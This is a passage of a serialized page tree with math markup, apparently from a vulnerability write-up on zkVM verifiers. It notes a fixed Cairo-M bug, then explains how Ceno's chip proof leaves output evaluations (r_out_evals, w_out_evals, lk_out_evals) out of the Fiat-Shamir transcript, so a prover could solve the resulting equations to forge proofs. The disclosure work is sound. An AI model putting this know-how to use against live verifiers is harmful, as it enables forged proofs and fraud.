"children":120966},{"className":120965,"style":114789},[261],[],{"type":26,"tag":137,"props":120968,"children":120970},{"className":120969},[267,268,269,270],[120971],{"type":26,"tag":137,"props":120972,"children":120974},{"className":120973},[169,270],[120975],{"type":26,"tag":137,"props":120976,"children":120978},{"className":120977},[169,270],[120979],{"type":32,"value":878},{"type":26,"tag":137,"props":120981,"children":120983},{"className":120982},[453],[120984],{"type":32,"value":456},{"type":26,"tag":137,"props":120986,"children":120988},{"className":120987},[246],[120989],{"type":26,"tag":137,"props":120990,"children":120993},{"className":120991,"style":120992},[251],"height:0.562em;",[120994],{"type":26,"tag":137,"props":120995,"children":120996},{},[],{"type":26,"tag":137,"props":120998,"children":121000},{"className":120999},[197,116136],[],{"type":26,"tag":137,"props":121002,"children":121004},{"className":121003},[169],[121005],{"type":32,"value":470},{"type":26,"tag":35,"props":121007,"children":121008},{},[121009,121011],{"type":32,"value":121010},"The global check is then that ",{"type":26,"tag":130,"props":121012,"children":121014},{"className":121013},[133,134],[121015],{"type":26,"tag":137,"props":121016,"children":121018},{"className":121017},[140],[121019],{"type":26,"tag":137,"props":121020,"children":121022},{"className":121021,"ariaHidden":146},[145],[121023,121064,121095],{"type":26,"tag":137,"props":121024,"children":121026},{"className":121025},[151],[121027,121031,121036,121041,121046,121051,121055,121060],{"type":26,"tag":137,"props":121028,"children":121030},{"className":121029,"style":157},[156],[],{"type":26,"tag":137,"props":121032,"children":121034},{"className":121033},[169,170],[121035],{"type":32,"value":942},{"type":26,"tag":137,"props":121037,"children":121039},{"className":121038},[162],[121040],{"type":32,"value":165},{"type":26,"tag":137,"props":121042,"children":121044},{"className":121043},[169,170],[121045],{"type":32,"value":35},{"type":26,"tag":137,"props":121047,"children":121049},{"className":121048},[197],[121050],{"type":32,"value":200},{"type":26,"tag":137,"props":121052,"children":121054},{"className":121053,"style":348},[184],[],{"type":26,"tag":137,"props":121056,"children":121058},{"className":121057},[353],[121059],{"type":32,"value":356},{"type":26,"tag":137,"props":121061,"children":121063},{"className":121062,"style":348},[184],[],{"type":26,"tag":137,"props":121065,"children":121067},{"className":121066},[151],[121068,121072,121082,121086,121091],{"type":26,"tag":137,"props":121069,"children":121071},{"className":121070,"style":157},[156],[],{"type":26,"tag":137,"props":121073,"children":121075},{"className":121074},[169,32],[121076],{"type":26,"tag":137,"props":121077,"children":121079},{"className":121078},[169],[121080],{"type":32,"value":121081},"(other terms)",{"type":26,"tag":137,"props":121083,"children":121085},{"className":121084,"style":281},[184],[],{"type":26,"tag":137,"props":121087,"children":121089},{"className":121088},[286],[121090],{"type":32,"value":289},{"type":26,"tag":137,"props":121092,"children":121094},{"className":121093,"style":281},[184],[],{"type":26,"tag":137,"props":121096,"children":121098},{"className":121097},[151],[121099,121103],{"type":26,"tag":137,"props":121100,"children":121102},{"className":121101,"style":368},[156],[],{"type":26,"tag":137,"props":121104,"children":121106},{"className":121105},[169],[121107],{"type":32,"value":1817},{"type":26,"tag":35,"props":121109,"children":121110},{},[121111],{"type":32,"value":121112},"With challenges fixed, this is a rational equation in public data. This is not linear, but still algebraically solvable.",{"type":26,"tag":35,"props":121114,"children":121115},{},[121116],{"type":32,"value":121117},"Public-data coordinates participate in verification relations through extension-field arithmetic (including extension-valued public-memory entries), so the forged-parameter search is a coupled extension-field system.",{"type":26,"tag":35,"props":121119,"children":121120},{},[121121,121125,121127],{"type":26,"tag":84,"props":121122,"children":121123},{},[121124],{"type":32,"value":119321},{"type":32,"value":121126}," Fixed on October 31, 2025 via ",{"type":26,"tag":41,"props":121128,"children":121131},{"href":121129,"rel":121130},"https://github.com/kkrt-labs/cairo-m/pull/352/commits/92b6740937e904e0002e7ee099fec357127c1d16",[45],[121132],{"type":32,"value":121133},"commit 92b6740",{"type":26,"tag":3265,"props":121135,"children":121136},{},[],{"type":26,"tag":118,"props":121138,"children":121140},{"id":121139},"ceno-scroll",[121141],{"type":32,"value":121142},"Ceno (Scroll)",{"type":26,"tag":35,"props":121144,"children":121145},{},[121146],{"type":32,"value":121147},"Ceno is a zkVM by Scroll, using GKR with a tower sumcheck structure.",{"type":26,"tag":35,"props":121149,"children":121150},{},[121151,121153,121158],{"type":32,"value":121152},"Ceno splits verification into ",{"type":26,"tag":84,"props":121154,"children":121155},{},[121156],{"type":32,"value":121157},"chips",{"type":32,"value":121159},", with one per opcode or lookup table. Each chip proves its constraints independently.",{"type":26,"tag":35,"props":121161,"children":121162},{},[121163,121165,121170],{"type":32,"value":121164},"Many per-record values (reads, writes, lookups) are batched into a binary tree structure. Each layer folds pairs of values with random challenges; this is the ",{"type":26,"tag":84,"props":121166,"children":121167},{},[121168],{"type":32,"value":121169},"tower sumcheck",{"type":32,"value":470},{"type":26,"tag":35,"props":121172,"children":121173},{},[121174],{"type":32,"value":121175},"All read records must match all write records (plus initial/final state). This is checked via a multiset equality, this time using a product instead of logup:",{"type":26,"tag":35,"props":121177,"children":121178},{},[121179],{"type":26,"tag":130,"props":121180,"children":121182},{"className":121181},[133,134],[121183],{"type":26,"tag":137,"props":121184,"children":121186},{"className":121185},[140],[121187],{"type":26,"tag":137,"props":121188,"children":121190},{"className":121189,"ariaHidden":146},[145],[121191,121365,121538],{"type":26,"tag":137,"props":121192,"children":121194},{"className":121193},[151],[121195,121199,121257,121261,121270,121275,121285,121290,121352,121356,121361],{"type":26,"tag":137,"props":121196,"children":121198},{"className":121197,"style":95590},[156],[],{"type":26,"tag":137,"props":121200,"children":121202},{"className":121201},[3722],[121203,121209],{"type":26,"tag":137,"props":121204,"children":121206},{"className":121205,"style":3725},[3722,3723,3724],[121207],{"type":32,"value":121208},"∏",{"type":26,"tag":137,"props":121210,"children":121212},{"className":121211},[236],[121213],{"type":26,"tag":137,"props":121214,"children":121216},{"className":121215},[241,417],[121217,121246],{"type":26,"tag":137,"props":121218,"children":121220},{"className":121219},[246],[121221,121241],{"type":26,"tag":137,"props":121222,"children":121224},{"className":121223,"style":116822},[251],[121225],{"type":26,"tag":137,"props":121226,"children":121227},{"style":24239},[121228,121232],{"type":26,"tag":137,"props":121229,"children":121231},{"className":121230,"style":262},[261],[],{"type":26,"tag":137,"props":121233,"children":121235},{"className":121234},[267,268,269,270],[121236],{"type":26,"tag":137,"props":121237,"children":121239},{"className":121238},[169,170,270],[121240],{"type":32,"value":506},{"type":26,"tag":137,"props":121242,"children":121244},{"className":121243},[453],[121245],{"type":32,"value":456},{"type":26,"tag":137,"props":121247,"children":121249},{"className":121248},[246],[121250],{"type":26,"tag":137,"props":121251,"children":121253},{"className":121252,"style":117102},[251],[121254],{"type":26,"tag":137,"props":121255,"children":121256},{},[],{"type":26,"tag":137,"props":121258,"children":121260},{"className":121259,"style":185},[184],[],{"type":26,"tag":137,"props":121262,"children":121264},{"className":121263},[169,32],[121265],{"type":26,"tag":137,"props":121266,"children":121268},{"className":121267},[169],[121269],{"type":32,"value":624},{"type":26,"tag":137,"props":121271,"children":121273},{"className":121272,"style":621},[169],[121274],{"type":32,"value":5666},{"type":26,"tag":137,"props":121276,"children":121278},{"className":121277},[169,32],[121279],{"type":26,"tag":137,"props":121280,"children":121282},{"className":121281},[169],[121283],{"type":32,"value":121284},"out",{"type":26,"tag":137,"props":121286,"children":121288},{"className":121287,"style":621},[169],[121289],{"type":32,"value":5666},{"type":26,"tag":137,"props":121291,"children":121293},{"className":121292},[169],[121294,121304],{"type":26,"tag":137,"props":121295,"children":121297},{"className":121296},[169,32],[121298],{"type":26,"tag":137,"props":121299,"children":121301},{"className":121300},[169],[121302],{"type":32,"value":121303},"evals",{"type":26,"tag":137,"props":121305,"children":121307},{"className":121306},[236],[121308],{"type":26,"tag":137,"props":121309,"children":121311},{"className":121310},[241,417],[121312,121341],{"type":26,"tag":137,"props":121313,"children":121315},{"className":121314},[246],[121316,121336],{"type":26,"tag":137,"props":121317,"children":121319},{"className":121318,"style":556},[251],[121320],{"type":26,"tag":137,"props":121321,"children":121322},{"style":116745},[121323,121327],{"type":26,"tag":137,"props":121324,"children":121326},{"className":121325,"style":262},[261],[],{"type":26,"tag":137,"props":121328,"children":121330},{"className":121329},[267,268,269,270],[121331],{"type":26,"tag":137,"props":121332,"children":121334},{"className":121333},[169,170,270],[121335],{"type":32,"value":506},{"type":26,"tag":137,"props":121337,"children":121339},{"className":121338},[453],[121340],{"type":32,"value":456},{"type":26,"tag":137,"props":121342,"children":121344},{"className":121343},[246],[121345],{"type":26,"tag":137,"props":121346,"children":121348},{"className":121347,"style":464},[251],[121349],{"type":26,"tag":137,"props":121350,"children":121351},{},[],{"type":26,"tag":137,"props":121353,"children":121355},{"className":121354,"style":281},[184],[],{"type":26,"tag":137,"props":121357,"children":121359},{"className":121358},[286],[121360],{"type":32,"value":289},{"type":26,"tag":137,"props":121362,"children":121364},{"className":121363,"style":281},[184],[],{"type":26,"tag":137,"props":121366,"children":121368},{"className":121367},[151],[121369,121374,121431,121435,121444,121449,121458,121463,121525,121529,121534],{"type":26,"tag":137,"props":121370,"children":121373},{"className":121371,"style":121372},[156],"height:1.1858em;vertical-align:-0.4358em;",[],{"type":26,"tag":137,"props":121375,"children":121377},{"className":121376},[3722],[121378,121383],{"type":26,"tag":137,"props":121379,"children":121381},{"className":121380,"style":3725},[3722,3723,3724],[121382],{"type":32,"value":121208},{"type":26,"tag":137,"props":121384,"children":121386},{"className":121385},[236],[121387],{"type":26,"tag":137,"props":121388,"children":121390},{"className":121389},[241,417],[121391,121420],{"type":26,"tag":137,"props":121392,"children":121394},{"className":121393},[246],[121395,121415],{"type":26,"tag":137,"props":121396,"children":121398},{"className":121397,"style":116822},[251],[121399],{"type":26,"tag":137,"props":121400,"children":121401},{"style":24239},[121402,121406],{"type":26,"tag":137,"props":121403,"children":121405},{"className":121404,"style":262},[261],[],{"type":26,"tag":137,"props":121407,"children":121409},{"className":121408},[267,268,269,270],[121410],{"type":26,"tag":137,"props":121411,"children":121413},{"className":121412,"style":116838},[169,170,270],[121414],{"type":32,"value":11242},{"type":26,"tag":137,"props":121416,"children":121418},{"className":121417},[453],[121419],{"type":32,"value":456},{"type":26,"tag":137,"props":121421,"children":121423},{"className":121422},[246],[121424],{"type":26,"tag":137,"props":121425,"children":121427},{"className":121426,"style":116853},[251],[121428],{"type":26,"tag":137,"props":121429,"children":121430},{},[],{"type":26,"tag":137,"props":121432,"children":121434},{"className":121433,"style":185},[184],[],{"type":26,"tag":137,"props":121436,"children":121438},{"className":121437},[169,32],[121439],{"type":26,"tag":137,"props":121440,"children":121442},{"className":121441},[169],[121443],{"type":32,"value":52174},{"type":26,"tag":137,"props":121445,"children":121447},{"className":121446,"style":621},[169],[121448],{"type":32,"value":5666},{"type":26,"tag":137,"props":121450,"children":121452},{"className":121451},[169,32],[121453],{"type":26,"tag":137,"props":121454,"children":121456},{"className":121455},[169],[121457],{"type":32,"value":121284},{"type":26,"tag":137,"props":121459,"children":121461},{"className":121460,"style":621},[169],[121462],{"type":32,"value":5666},{"type":26,"tag":137,"props":121464,"children":121466},{"className":121465},[169],[121467,121476],{"type":26,"tag":137,"props":121468,"children":121470},{"className":121469},[169,32],[121471],{"type":26,"tag":137,"props":121472,"children":121474},{"className":121473},[169],[121475],{"type":32,"value":121303},{"type":26,"tag":137,"props":121477,"children":121479},{"className":121478},[236],[121480],{"type":26,"tag":137,"props":121481,"children":121483},{"className":121482},[241,417],[121484,121513],{"type":26,"tag":137,"props":121485,"children":121487},{"className":121486},[246],[121488,121508],{"type":26,"tag":137,"props":121489,"children":121491},{"className":121490,"style":556},[251],[121492],{"type":26,"tag":137,"props":121493,"children":121494},{"style":116745},[121495,121499],{"type":26,"tag":137,"props":121496,"children":121498},{"className":121497,"style":262},[261],[],{"type":26,"tag":137,"props":121500,"children":121502},{"className":121501},[267,268,269,270],[121503],{"type":26,"tag":137,"props":121504,"children":121506},{"className":121505,"style":116838},[169,170,270],[121507],{"type":32,"value":11242},{"type":26,"tag":137,"props":121509,"children":121511},{"className":121510},[453],[121512],{"type":32,"value":456},{"type":26,"tag":137,"props":121514,"children":121516},{"className":121515},[246],[121517],{"type":26,"tag":137,"props":121518,"children":121521},{"className":121519,"style":121520},[251],"height:0.2861em;",[121522],{"type":26,"tag":137,"props":121523,"children":121524},{},[],{"type":26,"tag":137,"props":121526,"children":121528},{"className":121527,"style":348},[184],[],{"type":26,"tag":137,"props":121530,"children":121532},{"className":121531},[353],[121533],{"type":32,"value":2172},{"type":26,"tag":137,"props":121535,"children":121537},{"className":121536,"style":348},[184],[],{"type":26,"tag":137,"props":121539,"children":121541},{"className":121540},[151],[121542,121546,121551,121561],{"type":26,"tag":137,"props":121543,"children":121545},{"className":121544,"style":157},[156],[],{"type":26,"tag":137,"props":121547,"children":121549},{"className":121548},[162],[121550],{"type":32,"value":165},{"type":26,"tag":137,"props":121552,"children":121554},{"className":121553},[169,32],[121555],{"type":26,"tag":137,"props":121556,"children":121558},{"className":121557},[169],[121559],{"type":32,"value":121560},"state factors",{"type":26,"tag":137,"props":121562,"children":121564},{"className":121563},[197],[121565],{"type":32,"value":200},{"type":26,"tag":35,"props":121567,"children":121568},{},[121569],{"type":26,"tag":84,"props":121570,"children":121571},{},[121572],{"type":32,"value":118028},{"type":26,"tag":5512,"props":121574,"children":121576},{"code":121575},"ZKVMChipProof {\n    r_out_evals: [[FieldElement]],   // \u003C- VULNERABLE\n    w_out_evals: [[FieldElement]],   // \u003C- VULNERABLE\n    lk_out_evals: [[FieldElement]],  // \u003C- VULNERABLE\n    tower_proof: [...],\n    gkr_iop_proof: [...],\n}\n",[121577],{"type":26,"tag":130,"props":121578,"children":121579},{"__ignoreMap":7},[121580],{"type":32,"value":121575},{"type":26,"tag":35,"props":121582,"children":121583},{},[121584,121590,121591,121597,121598,121604],{"type":26,"tag":130,"props":121585,"children":121587},{"className":121586},[],[121588],{"type":32,"value":121589},"r_out_evals",{"type":32,"value":1108},{"type":26,"tag":130,"props":121592,"children":121594},{"className":121593},[],[121595],{"type":32,"value":121596},"w_out_evals",{"type":32,"value":3525},{"type":26,"tag":130,"props":121599,"children":121601},{"className":121600},[],[121602],{"type":32,"value":121603},"lk_out_evals",{"type":32,"value":121605}," are used to initialize the tower sumcheck claim, but they're never absorbed into the transcript. This leaves us with two equations:",{"type":26,"tag":4820,"props":121607,"children":121608},{},[121609],{"type":26,"tag":3430,"props":121610,"children":121611},{},[121612,121617,121619,121625],{"type":26,"tag":84,"props":121613,"children":121614},{},[121615],{"type":32,"value":121616},"GKR/Tower equation",{"type":32,"value":121618}," (linear in ",{"type":26,"tag":130,"props":121620,"children":121622},{"className":121621},[],[121623],{"type":32,"value":121624},"out_evals",{"type":32,"value":26537},{"type":26,"tag":35,"props":121627,"children":121628},{},[121629,121631],{"type":32,"value":121630},"The tower sumcheck claim is ",{"type":26,"tag":130,"props":121632,"children":121634},{"className":121633},[133,134],[121635],{"type":26,"tag":137,"props":121636,"children":121638},{"className":121637},[140],[121639],{"type":26,"tag":137,"props":121640,"children":121642},{"className":121641,"ariaHidden":146},[145],[121643,121674,121799],{"type":26,"tag":137,"props":121644,"children":121646},{"className":121645},[151],[121647,121651,121661,121665,121670],{"type":26,"tag":137,"props":121648,"children":121650},{"className":121649,"style":95563},[156],[],{"type":26,"tag":137,"props":121652,"children":121654},{"className":121653},[169,32],[121655],{"type":26,"tag":137,"props":121656,"children":121658},{"className":121657},[169],[121659],{"type":32,"value":121660},"claim",{"type":26,"tag":137,"props":121662,"children":121664},{"className":121663,"style":281},[184],[],{"type":26,"tag":137,"props":121666,"children":121668},{"className":121667},[286],[121669],{"type":32,"value":289},{"type":26,"tag":137,"props":121671,"children":121673},{"className":121672,"style":281},[184],[],{"type":26,"tag":137,"props":121675,"children":121677},{"className":121676},[151],[121678,121683,121740,121744,121786,121790,121795],{"type":26,"tag":137,"props":121679,"children":121682},{"className":121680,"style":121681},[156],"height:1.2605em;vertical-align:-0.4358em;",[],{"type":26,"tag":137,"props":121684,"children":121686},{"className":121685},[3722],[121687,121692],{"type":26,"tag":137,"props":121688,"children":121690},{"className":121689,"style":3725},[3722,3723,3724],[121691],{"type":32,"value":3728},{"type":26,"tag":137,"props":121693,"children":121695},{"className":121694},[236],[121696],{"type":26,"tag":137,"props":121697,"children":121699},{"className":121698},[241,417],[121700,121729],{"type":26,"tag":137,"props":121701,"children":121703},{"className":121702},[246],[121704,121724],{"type":26,"tag":137,"props":121705,"children":121707},{"className":121706,"style":116822},[251],[121708],{"type":26,"tag":137,"props":121709,"children":121710},{"style":24239},[121711,121715],{"type":26,"tag":137,"props":121712,"children":121714},{"className":121713,"style":262},[261],[],{"type":26,"tag":137,"props":121716,"children":121718},{"className":121717},[267,268,269,270],[121719],{"type":26,"tag":137,"props":121720,"children":121722},{"className":121721,"style":116838},[169,170,270],[121723],{"type":32,"value":11242},{"type":26,"tag":137,"props":121725,"children":121727},{"className":121726},[453],[121728],{"type":32,"value":456},{"type":26,"tag":137,"props":121730,"children":121732},{"className":121731},[246],[121733],{"type":26,"tag":137,"props":121734,"children":121736},{"className":121735,"style":116853},[251],[121737],{"type":26,"tag":137,"props":121738,"children":121739},{},[],{"type":26,"tag":137,"props":121741,"children":121743},{"className":121742,"style":185},[184],[],{"type":26,"tag":137,"props":121745,"children":121747},{"className":121746},[169],[121748,121753],{"type":26,"tag":137,"props":121749,"children":121751},{"className":121750,"style":117702},[169,170],[121752],{"type":32,"value":117705},{"type":26,"tag":137,"props":121754,"children":121756},{"className":121755},[236],[121757],{"type":26,"tag":137,"props":121758,"children":121760},{"className":121759},[241],[121761],{"type":26,"tag":137,"props":121762,"children":121764},{"className":121763},[246],[121765],{"type":26,"tag":137,"props":121766,"children":121769},{"className":121767,"style":121768},[251],"height:0.8247em;",[121770],{"type":26,"tag":137,"props":121771,"children":121772},{"style":256},[121773,121777],{"type":26,"tag":137,"props":121774,"children":121776},{"className":121775,"style":262},[261],[],{"type":26,"tag":137,"props":121778,"children":121780},{"className":121779},[267,268,269,270],[121781],{"type":26,"tag":137,"props":121782,"children":121784},{"className":121783,"style":116838},[169,170,270],[121785],{"type":32,"value":11242},{"type":26,"tag":137,"props":121787,"children":121789},{"className":121788,"style":348},[184],[],{"type":26,"tag":137,"props":121791,"children":121793},{"className":121792},[353],[121794],{"type":32,"value":2172},{"type":26,"tag":137,"props":121796,"children":121798},{"className":121797,"style":348},[184],[],{"type":26,"tag":137,"props":121800,"children":121802},{"className":121801},[151],[121803,121807,121816,121821],{"type":26,"tag":137,"props":121804,"children":121806},{"className":121805,"style":97046},[156],[],{"type":26,"tag":137,"props":121808,"children":121810},{"className":121809},[169,32],[121811],{"type":26,"tag":137,"props":121812,"children":121814},{"className":121813},[169],[121815],{"type":32,"value":121284},{"type":26,"tag":137,"props":121817,"children":121819},{"className":121818,"style":621},[169],[121820],{"type":32,"value":5666},{"type":26,"tag":137,"props":121822,"children":121824},{"className":121823},[169],[121825,121834],{"type":26,"tag":137,"props":121826,"children":121828},{"className":121827},[169,32],[121829],{"type":26,"tag":137,"props":121830,"children":121832},{"className":121831},[169],[121833],{"type":32,"value":121303},{"type":26,"tag":137,"props":121835,"children":121837},{"className":121836},[236],[121838],{"type":26,"tag":137,"props":121839,"children":121841},{"className":121840},[241,417],[121842,121871],{"type":26,"tag":137,"props":121843,"children":121845},{"className":121844},[246],[121846,121866],{"type":26,"tag":137,"props":121847,"children":121849},{"className":121848,"style":556},[251],[121850],{"type":26,"tag":137,"props":121851,"children":121852},{"style":116745},[121853,121857],{"type":26,"tag":137,"props":121854,"children":121856},{"className":121855,"style":262},[261],[],{"type":26,"tag":137,"props":121858,"children":121860},{"className":121859},[267,268,269,270],[121861],{"type":26,"tag":137,"props":121862,"children":121864},{"className":121863,"style":116838},[169,170,270],[121865],{"type":32,"value":11242},{"type":26,"tag":137,"props":121867,"children":121869},{"className":121868},[453],[121870],{"type":32,"value":456},{"type":26,"tag":137,"props":121872,"children":121874},{"className":121873},[246],[121875],{"type":26,"tag":137,"props":121876,"children":121878},{"className":121877,"style":121520},[251],[121879],{"type":26,"tag":137,"props":121880,"children":121881},{},[],{"type":26,"tag":35,"props":121883,"children":121884},{},[121885,121887,121892],{"type":32,"value":121886},"This check is linear in ",{"type":26,"tag":130,"props":121888,"children":121890},{"className":121889},[],[121891],{"type":32,"value":121624},{"type":32,"value":470},{"type":26,"tag":4820,"props":121894,"children":121895},{"start":5412},[121896],{"type":26,"tag":3430,"props":121897,"children":121898},{},[121899,121904,121906,121911],{"type":26,"tag":84,"props":121900,"children":121901},{},[121902],{"type":32,"value":121903},"rw-product consistency",{"type":32,"value":121905}," (bilinear in ",{"type":26,"tag":130,"props":121907,"children":121909},{"className":121908},[],[121910],{"type":32,"value":121624},{"type":32,"value":26537},{"type":26,"tag":35,"props":121913,"children":121914},{},[121915],{"type":26,"tag":130,"props":121916,"children":121918},{"className":121917},[133,134],[121919],{"type":26,"tag":137,"props":121920,"children":121922},{"className":121921},[140],[121923],{"type":26,"tag":137,"props":121924,"children":121926},{"className":121925,"ariaHidden":146},[145],[121927,122098,122269],{"type":26,"tag":137,"props":121928,"children":121930},{"className":121929},[151],[121931,121935,121992,121996,122005,122010,122019,122024,122085,122089,122094],{"type":26,"tag":137,"props":121932,"children":121934},{"className":121933,"style":95590},[156],[],{"type":26,"tag":137,"props":121936,"children":121938},{"className":121937},[3722],[121939,121944],{"type":26,"tag":137,"props":121940,"children":121942},{"className":121941,"style":3725},[3722,3723,3724],[121943],{"type":32,"value":121208},{"type":26,"tag":137,"props":121945,"children":121947},{"className":121946},[236],[121948],{"type":26,"tag":137,"props":121949,"children":121951},{"className":121950},[241,417],[121952,121981],{"type":26,"tag":137,"props":121953,"children":121955},{"className":121954},[246],[121956,121976],{"type":26,"tag":137,"props":121957,"children":121959},{"className":121958,"style":116822},[251],[121960],{"type":26,"tag":137,"props":121961,"children":121962},{"style":24239},[121963,121967],{"type":26,"tag":137,"props":121964,"children":121966},{"className":121965,"style":262},[261],[],{"type":26,"tag":137,"props":121968,"children":121970},{"className":121969},[267,268,269,270],[121971],{"type":26,"tag":137,"props":121972,"children":121974},{"className":121973},[169,170,270],[121975],{"type":32,"value":506},{"type":26,"tag":137,"props":121977,"children":121979},{"className":121978},[453],[121980],{"type":32,"value":456},{"type":26,"tag":137,"props":121982,"children":121984},{"className":121983},[246],[121985],{"type":26,"tag":137,"props":121986,"children":121988},{"className":121987,"style":117102},[251],[121989],{"type":26,"tag":137,"props":121990,"children":121991},{},[],{"type":26,"tag":137,"props":121993,"children":121995},{"className":121994,"style":185},[184],[],{"type":26,"tag":137,"props":121997,"children":121999},{"className":121998},[169,32],[122000],{"type":26,"tag":137,"props":122001,"children":122003},{"className":122002},[169],[122004],{"type":32,"value":624},{"type":26,"tag":137,"props":122006,"children":122008},{"className":122007,"style":621},[169],[122009],{"type":32,"value":5666},{"type":26,"tag":137,"props":122011,"children":122013},{"className":122012},[169,32],[122014],{"type":26,"tag":137,"props":122015,"children":122017},{"className":122016},[169],[122018],{"type":32,"value":121284},{"type":26,"tag":137,"props":122020,"children":122022},{"className":122021,"style":621},[169],[122023],{"type":32,"value":5666},{"type":26,"tag":137,"props":122025,"children":122027},{"className":122026},[169],[122028,122037],{"type":26,"tag":137,"props":122029,"children":122031},{"className":122030},[169,32],[122032],{"type":26,"tag":137,"props":122033,"children":122035},{"className":122034},[169],[122036],{"type":32,"value":121303},{"type":26,"tag":137,"props":122038,"children":122040},{"className":122039},[236],[122041],{"type":26,"tag":137,"props":122042,"children":122044},{"className":122043},[241,417],[122045,122074],{"type":26,"tag":137,"props":122046,"children":122048},{"className":122047},[246],[122049,122069],{"type":26,"tag":137,"props":122050,"children":122052},{"className":122051,"style":556},[251],[122053],{"type":26,"tag":137,"props":122054,"children":122055},{"style":116745},[122056,122060],{"type":26,"tag":137,"props":122057,"children":122059},{"className":122058,"style":262},[261],[],{"type":26,"tag":137,"props":122061,"children":122063},{"className":122062},[267,268,269,270],[122064],{"type":26,"tag":137,"props":122065,"children":122067},{"className":122066},[169,170,270],[122068],{"type":32,"value":506},{"type":26,"tag":137,"props":122070,"children":122072},{"className":122071},[453],[122073],{"type":32,"value":456},{"type":26,"tag":137,"props":122075,"children":122077},{"className":122076},[246],[122078],{"type":26,"tag":137,"props":122079,"children":122081},{"className":122080,"style":464},[251],[122082],{"type":26,"tag":137,"props":122083,"children":122084},{},[],{"type":26,"tag":137,"props":122086,"children":122088},{"className":122087,"style":281},[184],[],{"type":26,"tag":137,"props":122090,"children":122092},{"className":122091},[286],[122093],{"type":32,"value":289},{"type":26,"tag":137,"props":122095,"children":122097},{"className":122096,"style":281},[184],[],{"type":26,"tag":137,"props":122099,"children":122101},{"className":122100},[151],[122102,122106,122163,122167,122176,122181,122190,122195,122256,122260,122265],{"type":26,"tag":137,"props":122103,"children":122105},{"className":122104,"style":121372},[156],[],{"type":26,"tag":137,"props":122107,"children":122109},{"className":122108},[3722],[122110,122115],{"type":26,"tag":137,"props":122111,"children":122113},{"className":122112,"style":3725},[3722,3723,3724],[122114],{"type":32,"value":121208},{"type":26,"tag":137,"props":122116,"children":122118},{"className":122117},[236],[122119],{"type":26,"tag":137,"props":122120,"children":122122},{"className":122121},[241,417],[122123,122152],{"type":26,"tag":137,"props":122124,"children":122126},{"className":122125},[246],[122127,122147],{"type":26,"tag":137,"props":122128,"children":122130},{"className":122129,"style":116822},[251],[122131],{"type":26,"tag":137,"props":122132,"children":122133},{"style":24239},[122134,122138],{"type":26,"tag":137,"props":122135,"children":122137},{"className":122136,"style":262},[261],[],{"type":26,"tag":137,"props":122139,"children":122141},{"className":122140},[267,268,269,270],[122142],{"type":26,"tag":137,"props":122143,"children":122145},{"className":122144,"style":116838},[169,170,270],[122146],{"type":32,"value":11242},{"type":26,"tag":137,"props":122148,"children":122150},{"className":122149},[453],[122151],{"type":32,"value":456},{"type":26,"tag":137,"props":122153,"children":122155},{"className":122154},[246],[122156],{"type":26,"tag":137,"props":122157,"children":122159},{"className":122158,"style":116853},[251],[122160],{"type":26,"tag":137,"props":122161,"children":122162},{},[],{"type":26,"tag":137,"props":122164,"children":122166},{"className":122165,"style":185},[184],[],{"type":26,"tag":137,"props":122168,"children":122170},{"className":122169},[169,32],[122171],{"type":26,"tag":137,"props":122172,"children":122174},{"className":122173},[169],[122175],{"type":32,"value":52174},{"type":26,"tag":137,"props":122177,"children":122179},{"className":122178,"style":621},[169],[122180],{"type":32,"value":5666},{"type":26,"tag":137,"props":122182,"children":122184},{"className":122183},[169,32],[122185],{"type":26,"tag":137,"props":122186,"children":122188},{"className":122187},[169],[122189],{"type":32,"value":121284},{"type":26,"tag":137,"props":122191,"children":122193},{"className":122192,"style":621},[169],[122194],{"type":32,"value":5666},{"type":26,"tag":137,"props":122196,"children":122198},{"className":122197},[169],[122199,122208],{"type":26,"tag":137,"props":122200,"children":122202},{"className":122201},[169,32],[122203],{"type":26,"tag":137,"props":122204,"children":122206},{"className":122205},[169],[122207],{"type":32,"value":121303},{"type":26,"tag":137,"props":122209,"children":122211},{"className":122210},[236],[122212],{"type":26,"tag":137,"props":122213,"children":122215},{"className":122214},[241,417],[122216,122245],{"type":26,"tag":137,"props":122217,"children":122219},{"className":122218},[246],[122220,122240],{"type":26,"tag":137,"props":122221,"children":122223},{"className":122222,"style":556},[251],[122224],{"type":26,"tag":137,"props":122225,"children":122226},{"style":116745},[122227,122231],{"type":26,"tag":137,"props":122228,"children":122230},{"className":122229,"style":262},[261],[],{"type":26,"tag":137,"props":122232,"children":122234},{"className":122233},[267,268,269,270],[122235],{"type":26,"tag":137,"props":122236,"children":122238},{"className":122237,"style":116838},[169,170,270],[122239],{"type":32,"value":11242},{"type":26,"tag":137,"props":122241,"children":122243},{"className":122242},[453],[122244],{"type":32,"value":456},{"type":26,"tag":137,"props":122246,"children":122248},{"className":122247},[246],[122249],{"type":26,"tag":137,"props":122250,"children":122252},{"className":122251,"style":121520},[251],[122253],{"type":26,"tag":137,"props":122254,"children":122255},{},[],{"type":26,"tag":137,"props":122257,"children":122259},{"className":122258,"style":348},[184],[],{"type":26,"tag":137,"props":122261,"children":122263},{"className":122262},[353],[122264],{"type":32,"value":2172},{"type":26,"tag":137,"props":122266,"children":122268},{"className":122267,"style":348},[184],[],{"type":26,"tag":137,"props":122270,"children":122272},{"className":122271},[151],[122273,122277,122282,122291],{"type":26,"tag":137,"props":122274,"children":122276},{"className":122275,"style":157},[156],[],{"type":26,"tag":137,"props":122278,"children":122280},{"className":122279},[162],[122281],{"type":32,"value":165},{"type":26,"tag":137,"props":122283,"children":122285},{"className":122284},[169,32],[122286],{"type":26,"tag":137,"props":122287,"children":122289},{"className":122288},[169],[122290],{"type":32,"value":121560},{"type":26,"tag":137,"props":122292,"children":122294},{"className":122293},[197],[122295],{"type":32,"value":200},{"type":26,"tag":35,"props":122297,"children":122298},{},[122299,122301,122470,122471,122640],{"type":32,"value":122300},"If we vary 